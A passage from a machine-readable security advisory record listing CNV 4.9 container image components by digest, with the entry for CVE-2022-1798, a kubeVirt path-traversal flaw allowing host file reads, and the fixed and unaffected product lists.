"8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", }, product_reference: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", }, product_reference: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", }, product_reference: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", }, product_reference: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", }, product_reference: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", }, product_reference: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", }, product_reference: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", ], known_not_affected: [ "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", "8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", 